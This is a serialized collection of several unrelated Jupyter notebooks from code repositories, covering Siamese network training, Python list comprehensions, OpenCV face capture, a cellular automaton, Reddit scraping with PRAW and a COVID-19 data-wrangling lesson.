0.0308\nEpoch 00039: val_loss did not improve from 0.02951\n234/234 [==============================] - 165s 707ms/step - loss: 0.0308 - val_loss: 0.0318\nEpoch 40/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0312\nEpoch 00040: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0312 - val_loss: 0.0305\nEpoch 41/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0309\nEpoch 00041: val_loss did not improve from 0.02951\n234/234 [==============================] - 166s 711ms/step - loss: 0.0309 - val_loss: 0.0303\nEpoch 42/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0305\nEpoch 00042: val_loss did not improve from 0.02951\n234/234 [==============================] - 164s 700ms/step - loss: 0.0305 - val_loss: 0.0296\nEpoch 43/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0307\nEpoch 00043: val_loss did not improve from 0.02951\n234/234 [==============================] - 166s 710ms/step - loss: 0.0307 - val_loss: 0.0301\nEpoch 44/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0308\nEpoch 00044: val_loss did not improve from 0.02951\n234/234 [==============================] - 169s 721ms/step - loss: 0.0308 - val_loss: 0.0299\nEpoch 45/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0305\nEpoch 00045: val_loss did not improve from 0.02951\n234/234 [==============================] - 169s 722ms/step - loss: 0.0305 - val_loss: 0.0307\nEpoch 46/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0309\nEpoch 00046: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0309 - val_loss: 0.0298\nEpoch 47/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0305\nEpoch 00047: val_loss did not improve from 0.02951\n234/234 [==============================] - 168s 719ms/step - loss: 0.0306 - val_loss: 0.0299\nEpoch 48/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0302\nEpoch 00048: val_loss did not improve from 0.02951\n234/234 [==============================] - 167s 713ms/step - loss: 0.0302 - val_loss: 0.0302\nEpoch 49/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0307\nEpoch 00049: val_loss improved from 0.02951 to 0.02931, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-49-0.03.h5\n234/234 [==============================] - 169s 720ms/step - loss: 0.0307 - val_loss: 0.0293\nEpoch 50/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0306\nEpoch 00050: val_loss did not improve from 0.02931\n234/234 [==============================] - 167s 714ms/step - loss: 0.0306 - val_loss: 0.0299\nEpoch 51/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0302\nEpoch 00051: val_loss improved from 0.02931 to 0.02882, saving model to PATH/TO/LOGDIR/snn-example-run/snn_model-51-0.03.h5\n234/234 [==============================] - 167s 712ms/step - loss: 0.0302 - val_loss: 0.0288\nEpoch 52/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0308\nEpoch 00052: val_loss did not improve from 0.02882\n234/234 [==============================] - 166s 710ms/step - loss: 0.0308 - val_loss: 0.0296\nEpoch 53/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0304\nEpoch 00053: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 714ms/step - loss: 0.0304 - val_loss: 0.0303\nEpoch 54/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0304\nEpoch 00054: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 712ms/step - loss: 0.0304 - val_loss: 0.0299\nEpoch 55/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0300\nEpoch 00055: val_loss did not improve from 0.02882\n234/234 [==============================] - 166s 707ms/step - loss: 0.0300 - val_loss: 0.0294\nEpoch 56/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0304\nEpoch 00056: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 715ms/step - loss: 0.0304 - val_loss: 0.0300\nEpoch 57/100\n233/234 [============================>.] - ETA: 0s - loss: 0.0306\nEpoch 00057: val_loss did not improve from 0.02882\n234/234 [==============================] - 167s 713ms/step - loss: 0.0306 - val_loss: 0.0295\nEpoch 58/100\n"
]
],
[
[
"### Evaluate the trained network\n\nLoad the best performing models. We need to load the weights and configs seperately rather than using model.load() as our custom loss function relies on the embedding length. As such, it is easier to load the weights and config seperately and build a model based on them.",
"_____no_output_____"
]
],
[
[
"def json_to_dict(json_src):\n with open(json_src, 'r') as j:\n return json.loads(j.read())",
"_____no_output_____"
],
[
"## Load in best trained SNN and emb model\n\n# The best performing model weights has the higher epoch number due to only saving the best weights\nhighest_epoch = 0\ndir_list = os.listdir(logdir)\n\nfor file in dir_list:\n if file.endswith(\".h5\"):\n epoch_num = int(file.split(\"-\")[1].split(\".h5\")[0])\n if epoch_num > highest_epoch:\n highest_epoch = epoch_num\n\n# Find the embedding and SNN weights src for the highest_epoch (best) model\nfor file in dir_list:\n # Zfill ensure a leading 0 on number < 10\n if (\"-\" + str(highest_epoch).zfill(2)) in file:\n if file.startswith(\"emb\"):\n embedding_weights_src = os.path.join(logdir, file)\n elif file.startswith(\"snn\"):\n snn_weights_src = os.path.join(logdir, file)\n\nhyperparams = os.path.join(logdir, \"hyperparams.json\")\nsnn_config = os.path.join(logdir, \"siamese_config.json\")\nemb_config = os.path.join(logdir, \"embedding_config.json\")\n\nsnn_config = json_to_dict(snn_config)\nemb_config = json_to_dict(emb_config)\n\n# json.dumps to make the dict a string, as required by model_from_json\nloaded_snn_model = model_from_json(json.dumps(snn_config))\nloaded_snn_model.load_weights(snn_weights_src)\n\nloaded_emb_model = model_from_json(json.dumps(emb_config))\nloaded_emb_model.load_weights(embedding_weights_src)\n\n\n# Store visualisations of the embeddings using PCA for display next to \"after training\" for comparisons\nembeddings_after_train = loaded_emb_model.predict(x_test[:num_vis, :])\npca = PCA(n_components=2)\ndecomposed_embeddings_after = pca.fit_transform(embeddings_after_train)\nevaluate(loaded_emb_model, highest_epoch)",
"_____no_output_____"
]
],
[
[
"### Comparisons of the embeddings in the latent space\n\nBased on [this notebook](https://github.com/AdrianUng/keras-triplet-loss-mnist/blob/master/Triplet_loss_KERAS_semi_hard_from_TF.ipynb).",
"_____no_output_____"
]
],
[
[
"step = 1 # Step = 1, take every element\n\ndict_embeddings = {}\ndict_gray = {}\ntest_class_labels = np.unique(np.array(y_test))\n\ndecomposed_embeddings_after = pca.fit_transform(embeddings_after_train)\n\nfig = plt.figure(figsize=(16, 8))\nfor label in test_class_labels:\n \n y_test_labels = y_test[:num_vis]\n \n decomposed_embeddings_class_before = decomposed_embeddings_before[y_test_labels == label]\n decomposed_embeddings_class_after = decomposed_embeddings_after[y_test_labels == label]\n \n plt.subplot(1,2,1)\n plt.scatter(decomposed_embeddings_class_before[::step, 1], decomposed_embeddings_class_before[::step, 0], label=str(label))\n plt.title('Embedding Locations Before Training')\n plt.legend()\n\n plt.subplot(1,2,2)\n plt.scatter(decomposed_embeddings_class_after[::step, 1], decomposed_embeddings_class_after[::step, 0], label=str(label))\n plt.title('Embedding Locations After %d Training Epochs' % epochs)\n plt.legend()\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Determine n_way_accuracy",
"_____no_output_____"
]
],
[
[
"prototypes = generate_prototypes(x_test, y_test, loaded_emb_model)\nn_way_accuracy_prototypes(val_steps, num_classes, loaded_emb_model)\n",
"_____no_output_____"
]
],
[
[
"### Visualise support set inference\n\nBased on code found [here](https://github.com/asagar60/One-Shot-Learning/blob/master/Omniglot_data/One_shot_implementation.ipynb).",
"_____no_output_____"
]
],
[
[
"n_samples = 10\nsample_imgs, min_index = visualise_n_way_prototypes(n_samples, loaded_emb_model)\n\nimg_matrix = []\nfor index in range(1, len(sample_imgs)):\n img_matrix.append(np.reshape(sample_imgs[index], (x_train_w, x_train_h)))\n\nimg_matrix = np.asarray(img_matrix)\nimg_matrix = np.vstack(img_matrix)\n\nf, ax = plt.subplots(1, 3, figsize = (10, 12))\nf.tight_layout()\nax[0].imshow(np.reshape(sample_imgs[0], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\nax[0].set_title(\"Test Image\")\nax[1].imshow(img_matrix ,vmin=0, vmax=1,cmap='Greys')\nax[1].set_title(\"Support Set (Img of same class shown first)\")\nax[2].imshow(np.reshape(sample_imgs[min_index], (x_train_w, x_train_h)),vmin=0, vmax=1,cmap='Greys')\nax[2].set_title(\"Image most similar to Test Image in Support Set\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4f9b0f64480d79ac91f1b1834b15897535219c | 3,956 | ipynb | Jupyter Notebook | python3_recipes/notebooks/_1_Sequences/_3_sequence_comprehension.ipynb | geekgap-io/python3_recipes | b92c82567e4ba59b67121047f6c543d462ee3056 | [
"MIT"
] | 2 | 2019-09-08T08:58:25.000Z | 2021-09-01T04:45:43.000Z | python3_recipes/notebooks/_1_Sequences/_3_sequence_comprehension.ipynb | geekgap-io/python3_recipes | b92c82567e4ba59b67121047f6c543d462ee3056 | [
"MIT"
] | null | null | null | python3_recipes/notebooks/_1_Sequences/_3_sequence_comprehension.ipynb | geekgap-io/python3_recipes | b92c82567e4ba59b67121047f6c543d462ee3056 | [
"MIT"
] | 1 | 2021-09-01T04:43:59.000Z | 2021-09-01T04:43:59.000Z | 26.72973 | 167 | 0.570779 | [
[
[
"## Problem\n- Uppercasing all the comments without using map",
"_____no_output_____"
]
],
[
[
"comments = [\n 'Python3 is awesome',\n 'Indeed, python3 is great',\n 'Absolutely ... Could not agree more !'\n]",
"_____no_output_____"
]
],
[
[
"## Answer\n- we can use sequence comprehension which are much more concise and readable",
"_____no_output_____"
]
],
[
[
"# uppercased_comments = list(map(lambda comment: comment.upper(), comments))\nuppercased_comments1 = [comment.upper() for comment in comments] #<0>\n\n# uppercased_comments = list(map(str.upper, comments))\nuppercased_comments2 = [str.upper(comment) for comment in comments] #<1>\n\n\nprint(comments) #<2>\nprint(uppercased_comments1)\nprint(uppercased_comments2)",
"['Python3 is awesome', 'Indeed, python3 is great', 'Absolutely ... Could not agree more !']\n['PYTHON3 IS AWESOME', 'INDEED, PYTHON3 IS GREAT', 'ABSOLUTELY ... COULD NOT AGREE MORE !']\n['PYTHON3 IS AWESOME', 'INDEED, PYTHON3 IS GREAT', 'ABSOLUTELY ... COULD NOT AGREE MORE !']\n"
]
],
[
[
"## Discussion\n- <0> list comprehension: each element of the new list being a transformation of the original one using the .upper() of the object\n- <1> list comprehension: each element of the new list being a transformation of the original one using the str.upper() function\n- <0, 1> both ways are much more cleaner and concise than the approach using map (see recipe 2.2)\n- <2> The original comments list is unchanged",
"_____no_output_____"
],
[
"## Problem\n- Filtering only the comments with strictly more than 20 characters without using filter",
"_____no_output_____"
],
[
"## Answer\n- we can use sequence comprehension with an if clause",
"_____no_output_____"
]
],
[
[
"# filtered_comments = list(filter(lambda comment: len(comment) > 20, comments))\nfiltered_comments = [comment for comment in comments if len(comment) > 20] #<0>\n\nprint(filtered_comments)\nprint(comments) #<1>",
"['Indeed, python3 is great', 'Absolutely ... Could not agree more !']\n['Python3 is awesome', 'Indeed, python3 is great', 'Absolutely ... Could not agree more !']\n"
]
],
[
[
"## Discussion\n- <0> adding an if clause to the element of the original list on the right hand side of the comprehension enables filtering which ones appear on the left side\n- <1> The original comments list is unchanged",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb4f9c25bc9571c4a02a9322a018cf7718f501d6 | 4,243 | ipynb | Jupyter Notebook | face-detection-and-data-creation.ipynb | psantheus/face-detection-cv2 | e0731e0da44b855da31458d6e5e397f35b5bacb1 | [
"MIT"
] | null | null | null | face-detection-and-data-creation.ipynb | psantheus/face-detection-cv2 | e0731e0da44b855da31458d6e5e397f35b5bacb1 | [
"MIT"
] | null | null | null | face-detection-and-data-creation.ipynb | psantheus/face-detection-cv2 | e0731e0da44b855da31458d6e5e397f35b5bacb1 | [
"MIT"
] | 1 | 2021-05-28T16:52:18.000Z | 2021-05-28T16:52:18.000Z | 32.389313 | 116 | 0.581428 | [
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as image\nimport os\nimport cv2",
"_____no_output_____"
],
[
"capture = cv2.VideoCapture(0)",
"_____no_output_____"
],
[
"face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')",
"_____no_output_____"
],
[
"#Iterate to save data for each face\nface_data = []\nface_name = input(\"Enter face name :\")\n\nface_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_alt.xml')\ndataset_path = './data/'\n\n#non-unique count, faces captured in total\nfacecount = 0\nwhile True:\n #ret is a return code, frame is the frame captured\n ret, frame = capture.read()\n #convert to grayscale if needed\n grayscale = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n #ret is false if frame was not captured properly, so we ignore that particular frame\n if ret == False:\n continue\n #stores the faces coordinates in rectangle start, width and height\n faces = face_cascade.detectMultiScale(grayscale, 1.3, 5)\n #iterating over each face detected in that particular frame\n for face in faces:\n #extracting our values from face\n x,y,w,h = face\n #offset value to increase our displayed rectangle size\n offset = 50\n #creating a rectangle using the coordinates known, top-left and bottom-right, color, and width\n cv2.rectangle(grayscale, (x - offset, y - offset), (x+w+offset, y+h+offset), (255,255,255), 4)\n #Slice of frame to select out face part\n face_section = grayscale[y - offset : y + h + offset, x - offset : x + w + offset]\n #resizing face section to a particular standard so that we will be able to apply KNN later\n face_section = cv2.resize(face_section, (100,100))\n #Storing facial data\n face_data.append(face_section)\n #increment facecount, better to interpret as framecount or size of training data\n facecount += 1\n print(facecount)\n cv2.imshow(\"Face Detection\", grayscale)\n #first and operation basically gets key from user and compares it to binary equivalent of mentioned key\n #loop breaks if key matches\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n#releases capture interface\ncapture.release()\n#closes any windows created, not doing so will cause process to freeze\ncv2.destroyAllWindows()\n\n#convert tuple to numpy array\nface_data = np.asarray(face_data)\n#resize, flattening to 1d rows, -1 causes other dimensions to adjust in favor of mantaining specified ones\nface_data = face_data.reshape((face_data.shape[0],-1))\nprint(np.shape(face_data))\n\n#saving data to path\nnp.save(dataset_path + face_name, face_data)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
cb4fa52a0cbdb4707f78da3407e02bea9c80866d | 4,911 | ipynb | Jupyter Notebook | Discussion Section Notes/Discussion Week 1.ipynb | amichuda/are106-python | 99f66ebb0a7689c1b01ce7f448bdce86c869131d | [
"MIT"
] | 1 | 2020-11-26T18:03:45.000Z | 2020-11-26T18:03:45.000Z | Discussion Section Notes/Discussion Week 1.ipynb | amichuda/are106-python | 99f66ebb0a7689c1b01ce7f448bdce86c869131d | [
"MIT"
] | null | null | null | Discussion Section Notes/Discussion Week 1.ipynb | amichuda/are106-python | 99f66ebb0a7689c1b01ce7f448bdce86c869131d | [
"MIT"
] | null | null | null | 16.424749 | 114 | 0.401955 | [
[
[
"# Question 1",
"_____no_output_____"
]
],
[
[
"string = \" Hello World\"\nprint(string)\n\nstring*3",
" Hello World\n"
]
],
[
[
"# Question 2",
"_____no_output_____"
]
],
[
[
"looper = [1,2,3,4,6,8]\n\nfor thing in looper:\n print(thing)\n \nfor thing in string:\n print(thing)\n \nstring_n = \"123468\"\n\nfor thing in string_n:\n print(thing)\n",
"1\n2\n3\n4\n6\n8\n \nH\ne\nl\nl\no\n \nW\no\nr\nl\nd\n1\n2\n3\n4\n6\n8\n"
]
],
[
[
"# Question 3",
"_____no_output_____"
]
],
[
[
"def f(x):\n y = x**2\n return y\n\nf(4)",
"_____no_output_____"
]
],
[
[
"# Question 4",
"_____no_output_____"
]
],
[
[
"a = [1,2,3]\n\n#f(a)\n#I tried to plug a list into my f function, it didn't work so I wrote a loop and hopefully that will work\n\nz = []\n\nfor thing in a:\n thing_sq = thing**2\n z.append(thing_sq)\n \nprint(z)\n \ndef f_list(x):\n y = []\n for thing in x:\n thing_sq = thing**2\n y.append(thing_sq)\n return y\n\nprint(f_list(a))",
"[1, 4, 9]\n[1, 4, 9]\n"
]
],
[
[
"# Question 5",
"_____no_output_____"
]
],
[
[
"b = [thing**2 for thing in a]\nprint(b)\n\nc = [f(thing) for thing in a]\nprint(c)",
"[1, 4, 9]\n[1, 4, 9]\n"
]
],
[
[
"# Question 6",
"_____no_output_____"
]
],
[
[
"import numpy as np\n\na_np = np.array(a)\nprint(a)\nprint(a_np)\n\na_np**2\n\n",
"[1, 2, 3]\n[1 2 3]\n"
]
],
[
[
"# Question 7",
"_____no_output_____"
]
],
[
[
"list = [1,7,100]\nnp_list = np.array(list)\n\nnp_list.mean()\nnp_list.var()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4faafaa570cfc3f2385cb25f7718cbd4af6f57 | 2,954 | ipynb | Jupyter Notebook | 001-Jupyter/001-Tutorials/002-IPython-Cookbook/chapter12_deterministic/02_cellular.ipynb | willirath/jupyter-jsc-notebooks | e64aa9c6217543c4ffb5535e7a478b2c9457629a | [
"BSD-3-Clause"
] | null | null | null | 001-Jupyter/001-Tutorials/002-IPython-Cookbook/chapter12_deterministic/02_cellular.ipynb | willirath/jupyter-jsc-notebooks | e64aa9c6217543c4ffb5535e7a478b2c9457629a | [
"BSD-3-Clause"
] | null | null | null | 001-Jupyter/001-Tutorials/002-IPython-Cookbook/chapter12_deterministic/02_cellular.ipynb | willirath/jupyter-jsc-notebooks | e64aa9c6217543c4ffb5535e7a478b2c9457629a | [
"BSD-3-Clause"
] | 1 | 2022-01-13T18:49:12.000Z | 2022-01-13T18:49:12.000Z | 25.465517 | 66 | 0.49763 | [
[
[
"# 12.2. Simulating an elementary cellular automaton",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n%matplotlib inline",
"_____no_output_____"
],
[
"u = np.array([[4], [2], [1]])",
"_____no_output_____"
],
[
"def step(x, rule_b):\n \"\"\"Compute a single stet of an elementary cellular\n automaton.\"\"\"\n # The columns contains the L, C, R values\n # of all cells.\n y = np.vstack((np.roll(x, 1), x,\n np.roll(x, -1))).astype(np.int8)\n # We get the LCR pattern numbers between 0 and 7.\n z = np.sum(y * u, axis=0).astype(np.int8)\n # We get the patterns given by the rule.\n return rule_b[7 - z]",
"_____no_output_____"
],
[
"def generate(rule, size=100, steps=100):\n \"\"\"Simulate an elementary cellular automaton given\n its rule (number between 0 and 255).\"\"\"\n # Compute the binary representation of the rule.\n rule_b = np.array(\n [int(_) for _ in np.binary_repr(rule, 8)],\n dtype=np.int8)\n x = np.zeros((steps, size), dtype=np.int8)\n # Random initial state.\n x[0, :] = np.random.rand(size) < .5\n # Apply the step function iteratively.\n for i in range(steps - 1):\n x[i + 1, :] = step(x[i, :], rule_b)\n return x",
"_____no_output_____"
],
[
"fig, axes = plt.subplots(3, 3, figsize=(8, 8))\nrules = [3, 18, 30,\n 90, 106, 110,\n 158, 154, 184]\nfor ax, rule in zip(axes.flat, rules):\n x = generate(rule)\n ax.imshow(x, interpolation='none',\n cmap=plt.cm.binary)\n ax.set_axis_off()\n ax.set_title(str(rule))",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb4fb8d6c784324ff83eb849292335d9b24c36a0 | 4,399 | ipynb | Jupyter Notebook | notebooks/01-scrape_data.ipynb | kingyiusuen/reddit-post-classification | accfe604a9fc24fa49bb0aa30add235553aaf0fa | [
"MIT"
] | 1 | 2021-08-05T17:00:19.000Z | 2021-08-05T17:00:19.000Z | notebooks/01-scrape_data.ipynb | kingyiusuen/reddit-post-classification | accfe604a9fc24fa49bb0aa30add235553aaf0fa | [
"MIT"
] | null | null | null | notebooks/01-scrape_data.ipynb | kingyiusuen/reddit-post-classification | accfe604a9fc24fa49bb0aa30add235553aaf0fa | [
"MIT"
] | null | null | null | 26.184524 | 326 | 0.544215 | [
[
[
"# Data Scraping",
"_____no_output_____"
]
],
[
[
"import json\nfrom pathlib import Path\n\nimport pandas as pd\nimport praw",
"_____no_output_____"
]
],
[
[
"To scrape posts from subreddits, you have to first put your reddit app's `client_id`, `client_secret` and `user_agent` in a `secrets.json` file in the project root directory. Here is [a blog post on the Reddit API](https://www.jcchouinard.com/get-reddit-api-credentials-with-praw/), in case you don't know what they are.",
"_____no_output_____"
]
],
[
[
"with open(\"../secrets.json\", \"r\") as f:\n secrets = json.load(f)\n\nCLIENT_ID = secrets[\"client_id\"]\nCLIENT_SECRET = secrets[\"client_secret\"]\nUSER_AGENT = secrets[\"user_agent\"]",
"_____no_output_____"
]
],
[
[
"Define some more configuration variables.",
"_____no_output_____"
]
],
[
[
"# Which subreddits to scrape\nSUBREDDIT_NAMES = [\"MachineLearning\", \"LearnMachineLearning\"]\n\n# The maximum number of posts to scrape per subreddit\n# Actual number may be smaller than this because some posts are link posts with no text\nLIMIT = 1000\n\n# Where the data should be saved\nOUTPUT_DIR = Path(\"../data/raw/\")\nOUTPUT_DIR.mkdir(parents=True, exist_ok=True)\nOUTPUT_FILEPATH = OUTPUT_DIR / \"reddit_posts.csv\"",
"_____no_output_____"
]
],
[
[
"A helper function for scraping a subreddit.",
"_____no_output_____"
]
],
[
[
"def scrape_one_subreddit(subreddit):\n posts = []\n for post in subreddit.new(limit=LIMIT):\n # Skip if the post is not a text post\n if not post.is_self:\n continue\n # Skip if the title is missing\n if not post.title:\n continue\n entry = {\n \"id\": post.id,\n \"created_utc\": post.created_utc,\n \"title\": post.title,\n \"selftext\": post.selftext,\n \"subreddit_name\": subreddit_name,\n }\n posts.append(entry)\n print(f\"Scraped {len(posts)} posts from r/{subreddit_name}\")\n return posts",
"_____no_output_____"
]
],
[
[
"Start scraping!",
"_____no_output_____"
]
],
[
[
"reddit = praw.Reddit(\n client_id=CLIENT_ID,\n client_secret=CLIENT_SECRET,\n user_agent=USER_AGENT,\n)\n\ndata = []\nfor subreddit_name in SUBREDDIT_NAMES:\n subreddit = reddit.subreddit(subreddit_name)\n data += scrape_one_subreddit(subreddit)\nheaders = [\"id\", \"created_utc\", \"title\", \"selftext\", \"subreddit_name\"]\ndf = pd.DataFrame(data, columns=headers)\ndf.to_csv(OUTPUT_FILEPATH, index=False)",
"Scraped 847 posts from r/MachineLearning\nScraped 715 posts from r/LearnMachineLearning\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb4fc548450afe87450e6687c8ab44749960bafe | 41,738 | ipynb | Jupyter Notebook | gateway-lesson/gateway/gateway-exploration.ipynb | mohsenumn/lessons | a85aa31a76f1da422bfd7fd01eb6b40c82dcc989 | [
"BSD-3-Clause"
] | null | null | null | gateway-lesson/gateway/gateway-exploration.ipynb | mohsenumn/lessons | a85aa31a76f1da422bfd7fd01eb6b40c82dcc989 | [
"BSD-3-Clause"
] | null | null | null | gateway-lesson/gateway/gateway-exploration.ipynb | mohsenumn/lessons | a85aa31a76f1da422bfd7fd01eb6b40c82dcc989 | [
"BSD-3-Clause"
] | null | null | null | 33.3904 | 421 | 0.607121 | [
[
[
"# Gateway Exploration\n\nIn this final segment you can take what you have learned and try it yourself. This segment is displayed in \"Notebook Mode\" rather than \"Presentation Mode.\" So you will need to scroll down as you explore more content. Notebook mode will allow you to see more content at once. It also allows you to compare and contrast cells and visualizations. \n\nHere you are free to explore as much as you want. There are lots of suggestions in the text and in comments in the code cells. Feel free to change attributes, code pieces, etc. If a code cell breaks (e.g., you see an error), then use a search engine to look up the error to see if you can try to solve it yourself. Another way to fix problems is to compare your code to the original code, which you can see here:\n\nhttps://github.com/hourofci/lessons-dev/blob/master/gateway-lesson/gateway/gateway-exploration.ipynb\n\nEnjoy two explorations to apply what you learned at a deeper level\n1. Data Wrangling - View, Clean, Extract, and Merge Data\n2. Data Visualization - Making Maps\n\nSo start scrolling down. Explore and try it yourself!",
"_____no_output_____"
]
],
[
[
"# This code cell starts the necessary setup for Hour of CI lesson notebooks.\n# First, it enables users to hide and unhide code by producing a 'Toggle raw code' button below.\n# Second, it imports the hourofci package, which is necessary for lessons and interactive Jupyter Widgets.\n# Third, it helps hide/control other aspects of Jupyter Notebooks to improve the user experience\n# This is an initialization cell\n# It is not displayed because the Slide Type is 'Skip'\n\nfrom IPython.display import HTML, IFrame, Javascript, display\nfrom ipywidgets import interactive\nimport ipywidgets as widgets\nfrom ipywidgets import Layout\n\nimport getpass # This library allows us to get the username (User agent string)\n\n# import package for hourofci project\nimport sys\nsys.path.append('../../supplementary') # relative path (may change depending on the location of the lesson notebook)\nimport hourofci\n\n# Retreive the user agent string, it will be passed to the hourofci submit button\nagent_js = \"\"\"\nIPython.notebook.kernel.execute(\"user_agent = \" + \"'\" + navigator.userAgent + \"'\");\n\"\"\"\nJavascript(agent_js)\n\n# load javascript to initialize/hide cells, get user agent string, and hide output indicator\n# hide code by introducing a toggle button \"Toggle raw code\"\nHTML(''' \n <script type=\"text/javascript\" src=\\\"../../supplementary/js/custom.js\\\"></script>\n \n <input id=\"toggle_code\" type=\"button\" value=\"Toggle raw code\">\n''')",
"_____no_output_____"
]
],
[
[
"## Setup\nAs always, you have to import the specific Python packages you'll need. You'll learn more about these in the other lessons, so for now let's import all of the packages that we will use for the Gateway Exploration component. If you want to dig deeper, feel free to search each package to understand what it does and what it can do for you.\n\nAs before, run this code by clicking the Run button left of the code cell. \n\nWait for the code to run. This is shown by the asterisk inside the brackets of <pre>In [ ]:</pre>. When it changes to a number and the print output shows up, you're good to go. ",
"_____no_output_____"
]
],
[
[
"# Run this code by clicking the Run button on the left to import all of the packages\n\nfrom matplotlib import pyplot\nimport pandas\nimport geopandas\n\nimport os\nimport pprint\nimport IPython\nfrom shapely.geometry import Polygon\nimport numpy as np\nfrom datetime import datetime\n\nprint(\"Modules imported\")",
"_____no_output_____"
]
],
[
[
"## Download COVID-19 Data\nThis optional code cell will download the US county level data released by the New York Times that we demonstrated earlier. It's found here: https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv.\n\nThe code below gets the data from the URL and puts it into a local file called \"us-counties.csv\"\n\nSkip this step if you already downloaded this data in an earlier segment. You can always come back and re-run it if you need to.",
"_____no_output_____"
]
],
[
[
"# Run this code cell if you have not yet downloaded the Covid-19 data from the New York Times\n!wget https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv -O us-counties.csv",
"_____no_output_____"
]
],
[
[
"## Exploration 1: View, Clean, Extract, and Merge Data",
"_____no_output_____"
],
[
"### View the data\nOnce you have downloaded the data file, you should look at it to make sure it is what you want.\n\nTo do that, we'll convert the downloaded file into a format that our Python program can use. Here we're going to use the dataframe format provided by the Pandas package. \n\nRecall that dataframes can be though of as two dimensional arrays or spreadsheets.",
"_____no_output_____"
]
],
[
[
"#Read the data that we downloaded from the NYT into a dataframe\ncovid_counties = pandas.read_csv('./us-counties.csv')\n\n# And let's see what it looks like!\nprint(covid_counties)",
"_____no_output_____"
]
],
[
[
"### Clean the Data\n\nIn large data like this, there are often a few cells scattered around that may cause you problems. Cleaning data is an important and often complex step, it is one part of **data wrangling.** For now, let's just look for the most common problem - empty cells where a value is expected. These are known as null cells and if a number is expected it will show up as NaN (not a number) in your dataframe.\n\nLet's see if we can find if we have any of these in our data. \n\nSince we're going to use the \"fips\" column to group our data, we need to know that there no null cells in that column. (The \"FIPS\" code is a unique identifier for geographic places. Google it if you want to know more!)",
"_____no_output_____"
]
],
[
[
"#Are there NaN cells in the fips column?\n\ncovid_counties['fips'].isnull().values.any()",
"_____no_output_____"
],
[
"#How many null cells are in the fips column?\n\ncount_nan = covid_counties['fips'].isnull().sum()\nprint ('Count of rows with null fips codes: ' + str(count_nan))",
"_____no_output_____"
]
],
[
[
"Ah ha, we found lots of problems in our data! \n\nLet's see what these rows containing null cells look like. Here we'll make a temporary dataframe that contains the rows with null fips codes. ",
"_____no_output_____"
]
],
[
[
"covid_counties_clean = covid_counties[covid_counties['fips'].notnull()]\n\nprint(covid_counties_clean)",
"_____no_output_____"
]
],
[
[
